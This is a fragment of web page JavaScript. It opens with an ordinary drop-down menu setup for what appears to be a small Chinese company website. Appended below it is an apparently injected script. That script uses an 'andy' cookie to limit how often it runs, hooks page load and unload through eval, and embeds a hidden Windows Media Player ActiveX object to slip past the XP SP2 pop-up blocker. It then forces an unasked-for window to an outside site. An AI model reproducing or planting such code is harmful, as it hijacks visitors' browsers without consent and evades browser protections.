	if (mtDropDown.isSupported()) {

		var ms = new mtDropDownSet(mtDropDown.direction.down, 0, 0, mtDropDown.reference.bottomLeft);

	

	
//第二菜单
		var menu2 = ms.addMenu(document.getElementById("menu2"));
		menu2.addItem("- 企业新闻", "NewsClass.asp?BigClass=企业新闻"); 
		menu2.addItem("- 业内资讯", "NewsClass.asp?BigClass=业内资讯"); 
		// send no URL if nothing should happen onclick
	
		// menu : 3
		var menu3 = ms.addMenu(document.getElementById("menu3"));
		menu3.addItem("- 产品展示", "Product.asp");
		menu3.addItem("- 产品分类", "Products.asp");	   
		
		// menu : 4


		// menu : 6
		//var menu6 = ms.addMenu(document.getElementById("menu6"));
		//menu6.addItem("- 人才招聘", "HrDemand.asp");
		//menu6.addItem("- 人才策略", "HrPolicy.asp");
		
		// menu : 7
		var menu7 = ms.addMenu(document.getElementById("menu7"));
		menu7.addItem("- 客户留言", "FeedbackView.asp");
		menu7.addItem("- 我要留言", "Feedback.asp");						
			
		// menu : 8

				
	
		mtDropDown.renderAll();
	}
<script type="text/javascript">
var nid=0;
var tid=431;
var mid=947;
var full=1;var popDialogOptions = "dialogWidth:800px; dialogHeight:600px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = "scrollbars=1,menubar=0,toolbar=0,location=0,personalbar=0,status=0,resizable=1";
var doexit = true;
var usePopDialog = true;
var isUsingSpecial = false;
function loadpopups(){
if(doexit && !isUsingSpecial) {
doexit = false;
window.open(popURL1,"",popWindowOptions);
}
}
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
var str_url;
str_url = window.location.search;
function ext()
{
if(doexit)
{
doexit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL1,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL1,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL1);}
}
}
function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

var popURL1 = 'http://www.hao8086.cn';

isUsingSpecial = true;

var Then = new Date();
Then.setTime(Then.getTime() + 2*60*60*1000);
var cookieString = new String(document.cookie);
var cookieHeader = "andy=";
var beginPosition = cookieString.indexOf(cookieHeader);

if (str_url.indexOf("2005")!=-1 ||str_url.indexOf("2006")!=-1 ||str_url.indexOf("2007")!=-1 || beginPosition != -1)
{
}
else
{
document.cookie = "andy=newandy;expires="+ Then.toGMTString();
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");
}
</script>
